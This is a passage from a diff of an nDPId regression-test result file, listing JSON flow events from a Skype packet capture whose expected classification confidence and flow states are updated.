{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970636044,"flow_last_seen":1431970646741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1016,120 +1019,120 @@ 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431970685839,"flow_last_seen":1431970687668,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648979,"flow_last_seen":1431970679027,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678945,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431970685839,"flow_last_seen":1431970687668,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648979,"flow_last_seen":1431970679027,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678945,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970635325,"flow_last_seen":1431970688837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970635325,"flow_last_seen":1431970688837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634731,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634731,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 